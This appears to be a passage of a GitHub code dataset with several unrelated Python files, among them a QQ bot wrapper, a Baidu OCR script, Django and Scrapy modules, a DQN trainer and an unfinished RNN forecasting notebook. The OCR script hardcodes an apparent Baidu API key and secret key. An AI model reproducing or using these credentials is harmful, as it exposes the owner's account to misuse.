style=\"#ff8f8f\")\n\n data = {\n \"sessionKey\": self._session,\n \"qq\": self._botId\n }\n\n data = req.post(url=self._url + _config[\"bind\"], data=json.dumps(data))\n if data.status_code == 200:\n data = json.loads(data.text)\n if data[\"code\"] == 0:\n self._c.log(\"[Notice]:绑定Session成功\", \"详细:session=\" + self._session, style=\"#a4ff8f\")\n else:\n self._c.log(\"[Error]:绑定Session失败:\" + data[\"msg\"], style=\"#ff8f8f\")\n\n\nclass Mirai(Init):\n\n def __repr__(self):\n return \"请选择一个操作模式\"\n\n # 开放接口\n @property\n def send(self):\n return sendTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n @property\n def get(self):\n return getTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n @property\n def set(self):\n return setTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n @property\n def upload(self):\n return uploadTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n @property\n def action(self):\n return actionTypeMode(session=self._session, uri=str(self._url), isSlice=self._isSlice)\n\n def event(self, eventId: int):\n return eventTypeMode(session=self._session, uri=str(self._url), eventId=eventId, isSlice=self._isSlice)\n\n\n@atexit.register\ndef _stop():\n _c = Console()\n data = {\n \"sessionKey\": _config[\"data\"][\"session\"],\n \"qq\": _config[\"data\"][\"botId\"]\n }\n try:\n data = req.post(url=_config[\"data\"][\"url\"] + _config[\"release\"], data=json.dumps(data))\n except Exception as re:\n _requests = re\n exit(404)\n if data.status_code == 200:\n data = json.loads(data.text)\n if data[\"code\"] == 0:\n _c.log(\"[Notice]:释放Session成功\", \"详细:session=\" + _config[\"data\"][\"session\"], style=\"#a4ff8f\")\n","repo_name":"easyMirais/easyMirai","sub_path":"easyMirai/method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"78"} +{"seq_id":"30880615557","text":"import requests\nimport base64\n\n\ndef get_access_token(url: str, api_key: str, secret_key: str) -> str:\n url += \"?grant_type=client_credentials&client_id={}&client_secret={}\".format(api_key, secret_key)\n return requests.post(url).json()[\"access_token\"]\n\n\ndef ocr(access_token: str, url: str, filename: str, img_type: str) -> str:\n with open(filename, mode=\"rb\") as f:\n base64_code = \"data:image/{};base64,{}\".format(img_type, base64.b64encode(f.read()).decode())\n\n url += \"?access_token={}\".format(access_token)\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n\n data_json = {\n \"image\": base64_code,\n # \"language_type\": \"ENG\"\n }\n\n result = requests.post(url, data=data_json, headers=headers).json()\n\n final_result = \"\"\n\n for word in result[\"words_result\"]:\n final_result += word[\"words\"].replace(\" \", \"\")\n\n return final_result\n\n\nif __name__ == \"__main__\":\n url_auth = \"https://aip.baidubce.com/oauth/2.0/token\"\n url_ocr = \"https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic\"\n\n api_key = \"OqriWbs7YCc57oWPM2RTtTuw\"\n secret_key = \"P5L5Wz1k75SMgZOGqypNVANNWt4nibm4\"\n\n access_token = get_access_token(url_auth, api_key, secret_key)\n\n final_str = \"\"\n for x in range(4):\n final_str += ocr(access_token, url_ocr, \"img/{}.png\".format(x + 1), \"png\")\n print(\"finish \" + \"{}.png\".format(x + 1))\n\n print(final_str)\n\n # with open(\"out.txt\", \"w\", encoding=\"utf-8\") as f:\n # f.write(final_str)\n","repo_name":"BillGoldenWater/Tools-py","sub_path":"BaiduOCR/BaiduOCR.py","file_name":"BaiduOCR.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2365152273","text":"from abc import ABC, abstractmethod\nimport pizza\nfrom ingredient_factory import NYPizzaIngredientFactory\nfrom pizza_enum import PizzaNames\n\n\nclass PizzaStore(ABC):\n def order_pizza(self, pizza_name: PizzaNames) -> pizza.Pizza:\n order = self.create_pizza(pizza_name)\n\n order.prepare()\n order.bake()\n order.cut()\n order.box()\n\n return order\n\n @abstractmethod\n def create_pizza(self, pizza_name: PizzaNames) -> pizza.Pizza:\n \"\"\"\n A factory method handles object creation and encapsulates it in a subclass.\n This decouples the client code in the superclass from the object creation code in the subclass.\n \"\"\"\n raise NotImplementedError\n\n\nclass NYPizzaStore(PizzaStore):\n def create_pizza(self, pizza_name: PizzaNames) -> pizza.Pizza:\n ingredient_factory = NYPizzaIngredientFactory()\n\n if pizza_name == PizzaNames.CHEESE:\n print(\"prepare New York style Cheese pizza\")\n return pizza.CheesePizza(ingredient_factory)\n\n if pizza_name == PizzaNames.MARGHERITA:\n print(\"prepare New York style Margherita pizza\")\n return pizza.MargheritaPizza(ingredient_factory)\n","repo_name":"AIright/python-patterns","sub_path":"factory/abstract_factory/pizza_store.py","file_name":"pizza_store.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41031274066","text":"from asgiref.sync import async_to_sync\nfrom channels.consumer import SyncConsumer\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\n\nclass RunMessageConsumer(SyncConsumer):\n def websocket_connect(self, event):\n group_name = self.scope[\"url_route\"][\"kwargs\"][\"run_id\"]\n\n self.send(\n {\n \"type\": \"websocket.accept\",\n }\n )\n\n # Join group\n print(\"Consumer joined run message group\", group_name)\n async_to_sync(self.channel_layer.group_add)(group_name, self.channel_name)\n\n def websocket_disconnect(self, event):\n\n # Leave group\n group_name = self.scope[\"url_route\"][\"kwargs\"][\"run_id\"]\n async_to_sync(self.channel_layer.group_discard)(group_name, self.channel_name)\n\n def new_message(self, event):\n to_sent = {\n \"type\": \"websocket.send\",\n \"text\": event[\"content\"],\n }\n self.send(to_sent)\n\n\nclass AsyncRunStatusConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.channel_group_name = \"\".join(\n [\"status_\", self.scope[\"url_route\"][\"kwargs\"][\"run_id\"]]\n )\n\n # Join the group\n await self.channel_layer.group_add(self.channel_group_name, self.channel_name)\n await self.accept()\n\n async def disconnect(self, close_code):\n # Leave the group\n await self.channel_layer.group_discard(\n self.channel_group_name, self.channel_name\n )\n\n # Receive message from WebSocket\n async def receive(self, text_data=None, bytes_data=None):\n pass\n\n # Receive message from the group\n async def new_message(self, event):\n print(\"Msg arrived in consumer, sending ot socket\")\n text = event[\"content\"]\n print(\"new async msg to\", self.channel_group_name)\n # Send message to WebSocket\n await self.send(text_data=text)\n\n\nclass AsyncRunProgressConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.channel_group_name = \"\".join(\n [\"progress_\", self.scope[\"url_route\"][\"kwargs\"][\"run_id\"]]\n )\n\n print(self.channel_group_name)\n\n # Join the group\n await self.channel_layer.group_add(self.channel_group_name, self.channel_name)\n await self.accept()\n\n async def disconnect(self, close_code):\n # Leave the group\n await self.channel_layer.group_discard(\n self.channel_group_name, self.channel_name\n )\n\n # Receive message from WebSocket\n async def receive(self, text_data=None, bytes_data=None):\n pass\n\n # Receive message from the group\n async def new_message(self, event):\n print(\"sent progress msg\", event[\"content\"])\n text = event[\"content\"]\n # Send message to WebSocket\n await self.send(text_data=text)\n","repo_name":"thomasbtf/snakesite","sub_path":"workflow/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"72130443132","text":"#! /usr/bin/python3\n# coding=utf-8\n\nimport pymysql\nfrom twisted.enterprise import adbapi\nimport re\nfrom datetime import datetime, timedelta\nimport pytz\n\n\ndef difTime(sqlTime):\n # monDict = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n monDict = {\n 'Jan': 1, 'Feb': 2, 'Mar': 3,\n 'Apr': 4, 'May': 5, 'Jun': 6,\n 'Jul': 7, 'Aug': 8, 'Sep': 9,\n 'Oct': 10, 'Nov': 11, 'Dec': 12\n }\n dateTup = re.match(r'.+?([0-9]{1,2})\\s([A-Z][a-z]{2})\\s([0-9]{4})\\s([0-9]{2}:[0-9]{2}:[0-9]{2}).*', sqlTime).groups()\n dateStr = dateTup[2] + '-' + str(monDict[dateTup[1]]) + '-' + dateTup[0] + ' ' + dateTup[3]\n dateTime = datetime.strptime(dateStr,\"%Y-%m-%d %H:%M:%S\")\n dateTime = dateTime.replace(tzinfo=pytz.timezone('GMT'))\n # print(dateTime)\n nowTime = datetime.now(pytz.timezone('GMT'))\n # print((nowTime - dateTime).seconds)\n # print(nowTime)\n # print(dateTime)\n return (nowTime - dateTime).seconds\n\n\n# 异步更新操作\nclass NewsPipeline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n \n\n @classmethod\n def from_settings(cls, settings): # 函数名固定,会被scrapy调用,直接可用settings的值\n \"\"\"\n 数据库建立连接\n :param settings: 配置参数\n :return: 实例化参数\n \"\"\"\n adbparams = dict(\n host=settings['MYSQL_HOST'],\n db=settings['MYSQL_DBNAME'],\n user=settings['MYSQL_USER'],\n password=settings['MYSQL_PASSWORD'],\n cursorclass=pymysql.cursors.DictCursor # 指定cursor类型\n )\n \n # 连接数据池ConnectionPool,使用pymysql或者Mysqldb连接\n dbpool = adbapi.ConnectionPool('pymysql', **adbparams)\n # 返回实例化参数\n return cls(dbpool)\n \n\n def process_item(self, item, spider):\n \"\"\"\n 使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象\n \"\"\"\n query = self.dbpool.runInteraction(self.do_insert, item) # 指定操作方法和操作数据\n # 添加异常处理\n query.addCallback(self.handle_error) # 处理异常\n \n\n def do_insert(self, cursor, item):\n # 对数据库进行插入操作,并不需要commit,twisted会自动commit\n insert_sql = \"insert into urls (url, time, judge, isdelete) values (%s, %s, 'no', 'no');\"\n inquire_sql = \"select time from urls where url = %s;\"\n update_sql = \"update urls set time = %s, judge = 'no' where url = %s;\"\n\n if not re.search(r'.*?(index|video?).*', item['url'], re.I):\n #if not re.search('index', item['url']):\n cursor.execute(inquire_sql, item['url'])\n n = cursor.fetchall()\n # print(n)\n if not n:\n try:\n cursor.execute(insert_sql, (item['url'], item['time']))\n except:\n pass\n elif difTime(n[0]['time']) > 7200:\n cursor.execute(update_sql, (item['time'], item['url']))\n \n\n def handle_error(self, failure):\n if failure:\n # 打印错误信息\n print(failure)\n","repo_name":"jackhanyuan/news-crawler-search-engine","sub_path":"news/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35535227539","text":"class Element:\n count = 0\n\n def __init__(self, value):\n self.value = value\n self.next = None\n Element.count += 1\n\n\nclass Stack:\n\n def __init__(self, head=None):\n if head is None:\n self.head = None\n else:\n self.head = Element(head)\n\n def push(self, new_element):\n \"\"\"Push (add) a new element onto the top of the stack\"\"\"\n if self.head is None:\n self.head = Element(new_element)\n else:\n node = Element(new_element)\n node.next = self.head\n self.head = node\n\n def pop(self):\n \"\"\"Pop (remove) the first element off the top of the stack and return it\"\"\"\n if self.head is None:\n return None\n else:\n value = self.head\n if self.head:\n self.head = self.head.next\n value.next = None\n return value\n\n\n# s1 = Stack()\n# print(s1.pop().value)\n# s1.push(1)\n# print(s1.head.__dict__)\n# s1.push(2)\n# print(s1.head.__dict__)\n# print(s1.head.next.__dict__)\n# s1.push(3)\n# print(s1.head.__dict__)\n# print(s1.pop().value)\n# print(s1.head.__dict__)\n","repo_name":"MrMuraliS/data-structures-and-algorithms","sub_path":"1. List-Based Collections/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"821229459","text":"import os, envio, pyodbc\nimport pandas as pd\nfrom flask import redirect, url_for\nfrom definitions import ROOT_DIR_STATIC\n\n\nd_f = pd.read_excel(os.path.join(ROOT_DIR_STATIC, 'pandas_cliente.xlsx'),\n engine='openpyxl')\n\nd_f[\"rut_cliente\"] = d_f[\"rut_cliente\"].astype(\"string\")\nd_f[\"rut_cliente\"] = d_f[\"rut_cliente\"].str.upper()\n\nprint(len(d_f))\nd_f = d_f.drop_duplicates([\"rut_cliente\"], keep='first')\nd_f = d_f.sort_values(by=['rut_cliente'], ascending=True)\n\n# d_f.to_excel('clientes_no_repetidos.xlsx', index=False, header=True)\n\nd_f = d_f.drop_duplicates([\"rut_cliente\"], keep='first')\n\nd_f[\"nombre_cliente\"] = d_f[\"nombre_cliente\"].astype(\"string\")\n\nprint(d_f.dtypes)\nd_f.convert_dtypes()\nprint(d_f.dtypes)\n\nprint(len(d_f))","repo_name":"azreizor/Itau_NGD","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42441907509","text":"from django.urls import path\n\nfrom account.views import ProfileView, EditProfileView, RegisterUserView, LoginUserView\n\nurlpatterns = [\n path('profile/', ProfileView.as_view(), name='show-profile'),\n path('edit', EditProfileView.as_view(), name='edit-profile'),\n path('register', RegisterUserView.as_view(), name='register-account'),\n path('login', LoginUserView.as_view(), name='login-account')\n]\n","repo_name":"jamedadi/Divar","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"30003619205","text":"# N개의 자연수 중 M개를 고른 수열 (비 내림차순, 중복x)\nimport sys\nfrom itertools import combinations\n\nn, m = map(int, input().split())\ndata = list(map(int, input().split()))\ndata.sort()\n\nfor c in sorted(set(combinations(data, m))):\n sys.stdout.write(' '.join(map(str, c)) + \"\\n\")\n# s = set()\n# arr = [0] * m\n#\n#\n# def func(idx, start):\n# if idx == m:\n# s.add(tuple(arr))\n# return\n# for i in range(start, n):\n# arr[idx] = data[i]\n# func(idx + 1, i + 1)\n#\n#\n# func(0, 0)\n# for a in sorted(s):\n# sys.stdout.write(' '.join(map(str, a)) + \"\\n\")\n","repo_name":"jaelyangChoi/CodingTest","sub_path":"brute_force/N,M/N과M(10).py","file_name":"N과M(10).py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1054764501","text":"import copy\nimport math\nimport time\n\nimport hydra\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom omegaconf import DictConfig, OmegaConf\n\nimport salina\nimport salina.rl.functional as RLF\nfrom salina import Workspace, get_arguments, get_class, instantiate_class\nfrom salina.agents import Agents, NRemoteAgent, RemoteAgent, TemporalAgent\nfrom salina.agents.gyma import AutoResetGymAgent\nfrom salina.logger import TFLogger\nfrom salina.rl.replay_buffer import ReplayBuffer\n\n\ndef soft_update_params(net, target_net, tau):\n for param, target_param in zip(net.parameters(), target_net.parameters()):\n target_param.data.copy_(tau * param.data + (1 - tau) * target_param.data)\n\n\ndef _state_dict(agent, device):\n sd = agent.state_dict()\n for k, v in sd.items():\n sd[k] = v.to(device)\n return sd\n\n\ndef run_dqn(q_agent, logger, cfg):\n q_agent.set_name(\"q_agent\")\n env_agent = AutoResetGymAgent(\n get_class(cfg.algorithm.env),\n get_arguments(cfg.algorithm.env),\n n_envs=int(cfg.algorithm.n_envs / cfg.algorithm.n_processes),\n )\n\n q_target_agent = copy.deepcopy(q_agent)\n\n acq_agent = TemporalAgent(Agents(env_agent, copy.deepcopy(q_agent)))\n acq_remote_agent, acq_workspace = NRemoteAgent.create(\n acq_agent,\n num_processes=cfg.algorithm.n_processes,\n t=0,\n n_steps=cfg.algorithm.n_timesteps,\n epsilon=1.0,\n )\n acq_remote_agent.seed(cfg.algorithm.env_seed)\n\n # == Setting up the training agents\n train_temporal_q_agent = TemporalAgent(q_agent)\n train_temporal_q_target_agent = TemporalAgent(q_target_agent)\n train_temporal_q_agent.to(cfg.algorithm.loss_device)\n train_temporal_q_target_agent.to(cfg.algorithm.loss_device)\n\n replay_buffer = ReplayBuffer(cfg.algorithm.buffer_size)\n acq_remote_agent(acq_workspace, t=0, n_steps=cfg.algorithm.n_timesteps, epsilon=1.0)\n replay_buffer.put(acq_workspace, time_size=cfg.algorithm.buffer_time_size)\n logger.message(\"[DDQN] Initializing replay buffer\")\n while replay_buffer.size() < cfg.algorithm.initial_buffer_size:\n acq_workspace.copy_n_last_steps(cfg.algorithm.overlapping_timesteps)\n acq_remote_agent(\n acq_workspace,\n t=cfg.algorithm.overlapping_timesteps,\n n_steps=cfg.algorithm.n_timesteps - cfg.algorithm.overlapping_timesteps,\n epsilon=1.0,\n )\n replay_buffer.put(acq_workspace, time_size=cfg.algorithm.buffer_time_size)\n\n logger.message(\"[DDQN] Learning\")\n epsilon_by_epoch = lambda epoch: cfg.algorithm.epsilon_final + (\n cfg.algorithm.epsilon_start - cfg.algorithm.epsilon_final\n ) * math.exp(-1.0 * epoch / cfg.algorithm.epsilon_exploration_decay)\n\n optimizer_args = get_arguments(cfg.algorithm.optimizer)\n optimizer = get_class(cfg.algorithm.optimizer)(\n q_agent.parameters(), **optimizer_args\n )\n iteration = 0\n for epoch in range(cfg.algorithm.max_epoch):\n epsilon = epsilon_by_epoch(epoch)\n logger.add_scalar(\"monitor/epsilon\", epsilon, iteration)\n\n for a in acq_remote_agent.get_by_name(\"q_agent\"):\n a.load_state_dict(_state_dict(q_agent, \"cpu\"))\n\n acq_workspace.copy_n_last_steps(cfg.algorithm.overlapping_timesteps)\n acq_remote_agent(\n acq_workspace,\n t=cfg.algorithm.overlapping_timesteps,\n n_steps=cfg.algorithm.n_timesteps - cfg.algorithm.overlapping_timesteps,\n epsilon=epsilon,\n )\n replay_buffer.put(acq_workspace, time_size=cfg.algorithm.buffer_time_size)\n\n done, creward = acq_workspace[\"env/done\", \"env/cumulated_reward\"]\n creward = creward[done]\n if creward.size()[0] > 0:\n logger.add_scalar(\"monitor/reward\", creward.mean().item(), epoch)\n\n logger.add_scalar(\"monitor/replay_buffer_size\", replay_buffer.size(), epoch)\n\n # Inner loop to minimize the TD\n for inner_epoch in range(cfg.algorithm.inner_epochs):\n batch_size = cfg.algorithm.batch_size\n replay_workspace = replay_buffer.get(batch_size).to(\n cfg.algorithm.loss_device\n )\n # Batch size + Time_size\n action = replay_workspace[\"action\"]\n train_temporal_q_agent(\n replay_workspace,\n t=0,\n n_steps=cfg.algorithm.buffer_time_size,\n replay=True,\n epsilon=0.0,\n )\n q, done, reward = replay_workspace[\"q\", \"env/done\", \"env/reward\"]\n\n with torch.no_grad():\n train_temporal_q_target_agent(\n replay_workspace,\n t=0,\n n_steps=cfg.algorithm.buffer_time_size,\n replay=True,\n epsilon=0.0,\n )\n q_target = replay_workspace[\"q\"]\n\n td = RLF.doubleqlearning_temporal_difference(\n q,\n action,\n q_target,\n reward,\n done,\n cfg.algorithm.discount_factor,\n )\n error = td ** 2\n\n # Add burning steps for the first timesteps in the trajectories (for recurrent policies)\n burning = torch.zeros_like(td)\n burning[cfg.algorithm.burning_timesteps :] = 1.0\n error = error * burning\n loss = error.mean()\n logger.add_scalar(\"loss/q_loss\", loss.item(), iteration)\n\n optimizer.zero_grad()\n loss.backward()\n\n if cfg.algorithm.clip_grad > 0:\n n = torch.nn.utils.clip_grad_norm_(\n q_agent.parameters(), cfg.algorithm.clip_grad\n )\n logger.add_scalar(\"monitor/grad_norm\", n.item(), iteration)\n optimizer.step()\n iteration += 1\n\n # Update of the target network\n if cfg.algorithm.hard_target_update:\n if epoch % cfg.algorithm.update_target_epochs == 0:\n q_target_agent.load_state_dict(q_agent.state_dict())\n else:\n tau = cfg.algorithm.update_target_tau\n soft_update_params(q_agent, q_target_agent, tau)\n\n\n@hydra.main(config_path=\".\", config_name=\"gym.yaml\")\ndef main(cfg):\n import torch.multiprocessing as mp\n\n mp.set_start_method(\"spawn\")\n logger = instantiate_class(cfg.logger)\n logger.save_hps(cfg)\n\n q_agent = instantiate_class(cfg.q_agent)\n run_dqn(q_agent, logger, cfg)\n\n\nif __name__ == \"__main__\":\n OmegaConf.register_new_resolver(\"plus\", lambda x, y: x + y)\n OmegaConf.register_new_resolver(\"n_gpus\", lambda x: 0 if x == \"cpu\" else 1)\n main()\n","repo_name":"facebookresearch/salina","sub_path":"salina_examples/rl/dqn/double_dqn/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":6671,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"78"} +{"seq_id":"15013405768","text":"# 6일차에서 작성한 RNN 모형을 이용하여 시간당 에너지 소비량 (시계열 데이터) 예측 코드 작성\n\n# https://towardsdatascience.com/building-rnn-lstm-and-gru-for-time-series-using-pytorch-a46e5b094e7b \n# data : https://www.kaggle.com/datasets/robikscube/hourly-energy-consumption\n# fitting the RNN model constructed in day6 (모델 구현할 때 line by line으로 차원 계산해보고 주석 달 것)\n\n#%%\n#EDA\nimport plotly.graph_objs as go #go를 통해서 Figure객체를 선언하고 Figure내에 필요한 Data와 Layout등을 설정해주는 방식\nfrom plotly.offline import iplot\n\ndef plot_dataset(df, title):\n data = []\n value = go.Scatter(\n x=df.index,\n y=df.value,\n mode=\"lines\",\n name=\"values\",\n marker=dict(),\n text=df.index,\n line=dict(color=\"rgba(0,0,0, 0.3)\"),\n )\n data.append(value)\n\n layout = dict(\n title=title,\n xaxis=dict(title=\"Date\", ticklen=5, zeroline=False),\n yaxis=dict(title=\"Value\", ticklen=5, zeroline=False),\n )\n\n fig = dict(data=data, layout=layout)\n iplot(fig)\n\n#%%\nimport pandas as pd\n\ndf = pd.read_csv('AEP_hourly.csv')\nprint(df)\n\ndf = df.set_index(['Datetime'])\ndf.index = pd.to_datetime(df.index)\nif not df.index.is_monotonic:\n df = df.sort_index()\n \ndf = df.rename(columns={'AEP_MW': 'value'})\ndf.shape\nplot_dataset(df, title='PJM East (AEP_MW) Region: estimated energy consumption in Megawatts (MW)')\n\n#%%\n#X(t+n)를 예측하기 위한 time_lags 생성\ndef generate_time_lags(df, n_lags):\n df_n = df.copy()\n for n in range(1, n_lags + 1):\n df_n[f\"lag{n}\"] = df_n[\"value\"].shift(n)\n #shift(n): 행의 위치를 일정 칸수씩 이동킨다\n #1.데이터프레임의 행을 위,아래로 옮기고 싶을때. 2. 데이터의 변화량을 저장하는 컬럼을 만들고 싶을 때\n df_n = df_n.iloc[n_lags:]\n return df_n\n \ninput_dim = 100\n\ndf_generated = generate_time_lags(df, input_dim)\ndf_generated.shape\n\n#%%\n#DateTime 인덱스에서 날짜 시간 특성을 만들기\ndf_features = (\n df\n .assign(hour = df.index.hour)\n .assign(day = df.index.day)\n .assign(month = df.index.month)\n .assign(day_of_week = df.index.dayofweek)\n .assign(week_of_year = df.index.week)\n )\n\n\ndf_features.shape\n#%%\n'''\ndef onehot_encode_pd(df, col_name):\n dummies = pd.get_dummies(df[col_name], prefix=col_name)\n return pd.concat([df, dummies], axis=1).drop(columns=[col_name])\n\ndf_features = onehot_encode_pd(df_features, ['month','day','day_of_week','week_of_year'])\n\n위의 코드가 ValueError: Length of 'prefix' (4) did not match the length of the columns being encoded (0)\n라는 오류가 떠서 아래 코드로 바꿔서 실행했을 때에는 실행이 되었는데, 어떤 부분이 잘못되었을까요?\n'''\n#%%\ndef onehot_encode_pd(df, col_name):\n dummies = pd.get_dummies(df,columns=col_name, prefix=col_name) #get_dummies:0과 1로만 이루어진 열을 생성->주어진 데이터 세트에서 원-핫 인코딩 열을 빠르게 생성\n return dummies\n\ndf_features_onehot = onehot_encode_pd(df_features, ['month','day','day_of_week','week_of_year'])\ndf_features_onehot\n\n#%%\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\n\ndef onehot_encode(df, onehot_columns):\n ct = ColumnTransformer(\n [('onehot', OneHotEncoder(drop='first'), onehot_columns)],\n remainder='passthrough'\n )\n #ColumnTransformer:숫자형과 범주형 변수 전처리 파이프라인 합치기; 입력 데이터에 있는 열마다 다른 변환을 적용\n #OneHotEncoder:각 범주별로 칼럼을 만들어서 해당 범주에 속하면 '1' (hot), 해당 범주에 속하지 않으면 '0' (cold) 으로 인코딩\n return ct.fit_transform(df)\n\nonehot_columns = ['hour']\nonehot_encoded = onehot_encode(df_features, onehot_columns)\n\nonehot_encoded\n\n'''\n 원-핫 인코딩은 DateTime 기능의 순환 패턴을 완전히 캡처하지 못하기 때문에 다른 방법 사용\n'''\n#%%\nimport numpy as np\n\n#시간의 원래 값을 사용하는 대신 주기성을 유지하면서 사인 변환을 사용\ndef generate_cyclical_features(df, col_name, period, start_num=0):\n kwargs = {\n f'sin_{col_name}' : lambda x: np.sin(2*np.pi*(df[col_name]-start_num)/period),\n f'cos_{col_name}' : lambda x: np.cos(2*np.pi*(df[col_name]-start_num)/period) \n }\n return df.assign(**kwargs).drop(columns=[col_name])\n#assign(): DataFrame에 새 열을 할당하는 메서드\n#kwargs : 새열이름 = 내용 형식으로 입력되는 키워드\n\ndf_cyclical_features = generate_cyclical_features(df_features_onehot, 'hour', 24, 0)\n# df_features = generate_cyclical_features(df_features, 'day_of_week', 7, 0)\n# df_features = generate_cyclical_features(df_features, 'month', 12, 1)\n# df_features = generate_cyclical_features(df_features, 'week_of_year', 52, 0)\n\ndf_cyclical_features\n\n#%%\nfrom datetime import date\nimport holidays\n\n# 1년 중 휴일이 에너지 소비 패턴에 영향을 미치는지 확인\n\nus_holidays = holidays.US() #공휴일 확인\n\n#주어진 날짜가 실제로 휴일인지 여부를 나타내는 이진 값이 있는 추가 열을 생성\ndef is_holiday(date):\n date = date.replace(hour = 0)\n return 1 if (date in us_holidays) else 0\n\ndef add_holiday_col(df, holidays):\n return df.assign(is_holiday = df.index.to_series().apply(is_holiday))\n\n\ndf_holiday_features = add_holiday_col(df_cyclical_features, us_holidays)\ndf_holiday_features[df_holiday_features['is_holiday']==1]\n\n\n#%%\nfrom sklearn.model_selection import train_test_split\n\ndef feature_label_split(df, target_col):\n y = df[[target_col]]\n X = df.drop(columns=[target_col])\n return X, y\n\ndef train_val_test_split(df, target_col, test_ratio):\n val_ratio = test_ratio / (1 - test_ratio)\n X, y = feature_label_split(df, target_col)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_ratio, shuffle=False)\n #shuffle=false : 세트로 분할하는 동안 섞는 것을 방지\n X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=val_ratio, shuffle=False)\n return X_train, X_val, X_test, y_train, y_val, y_test\n\nX_train, X_val, X_test, y_train, y_val, y_test = train_val_test_split(df_holiday_features, 'value', 0.2)\n\n#%%\n#Scaling\nfrom sklearn.preprocessing import MinMaxScaler\n\nscaler = MinMaxScaler()\n#X_std = (X - X.min(axis=0)) / (X.max(axis=0) - X.min(axis=0))\n# X_scaled = X_std * (max - min) + min\nX_train_arr = scaler.fit_transform(X_train)\nX_val_arr = scaler.transform(X_val)\nX_test_arr = scaler.transform(X_test)\n\ny_train_arr = scaler.fit_transform(y_train)\ny_val_arr = scaler.transform(y_val)\ny_test_arr = scaler.transform(y_test)\n\n#%%\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, MaxAbsScaler, RobustScaler\n\ndef get_scaler(scaler):\n scalers = {\n \"minmax\": MinMaxScaler,\n \"standard\": StandardScaler,\n \"maxabs\": MaxAbsScaler,\n \"robust\": RobustScaler,\n }\n return scalers.get(scaler.lower())()\n \nscaler = get_scaler('robust')\n\n#%%\n#데이터세트를 DataLoaders에 로드\nfrom torch.utils.data import TensorDataset, DataLoader\nimport torch\n\nbatch_size = 64\n\ntrain_features = torch.Tensor(X_train_arr)\ntrain_targets = torch.Tensor(y_train_arr)\nval_features = torch.Tensor(X_val_arr)\nval_targets = torch.Tensor(y_val_arr)\ntest_features = torch.Tensor(X_test_arr)\ntest_targets = torch.Tensor(y_test_arr)\n\ntrain_features[0].shape\ntest_targets[0].shape\n\ntrain = TensorDataset(train_features, train_targets)\nval = TensorDataset(val_features, val_targets)\ntest = TensorDataset(test_features, test_targets)\n\ntrain_loader = DataLoader(train, batch_size=batch_size, shuffle=False, drop_last=True)\nval_loader = DataLoader(val, batch_size=batch_size, shuffle=False, drop_last=True)\ntest_loader = DataLoader(test, batch_size=batch_size, shuffle=False, drop_last=True)\ntest_loader_one = DataLoader(test, batch_size=1, shuffle=False, drop_last=True)\n\n#%%\nif torch.cuda.is_available():\n device = torch.device('cuda')\nelse:\n device = torch.device('cpu')\n\n\n#%%\n#Training the model\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nclass Optimization:\n def __init__(self, model, loss_fn, optimizer):\n self.model = model\n self.loss_fn = loss_fn\n self.optimizer = optimizer\n self.train_losses = []\n self.val_losses = []\n \n def train_step(self, x, y):\n # Sets model to train mode\n self.model.train()\n hidden = self.model.initHidden()\n # Makes predictions\n yhat, hidden = self.model(x, hidden)\n\n # Computes loss\n loss = self.loss_fn(y, yhat)\n\n # Computes gradients\n loss.backward()\n\n # Updates parameters and zeroes gradients\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n # Returns the loss\n return loss.item()\n\n def train(self, train_loader, val_loader, batch_size=64, n_epochs=50, n_features=1):\n model_path = f'models/{self.model}_{datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")}'\n\n for epoch in range(1, n_epochs + 1):\n batch_losses = []\n for x_batch, y_batch in train_loader:\n x_batch = x_batch.view([batch_size, -1, n_features]).to(device)\n #사이즈가 -1로 설정되면 다른 차원으로부터 해당 값을 유추\n \n y_batch = y_batch.to(device)\n loss = 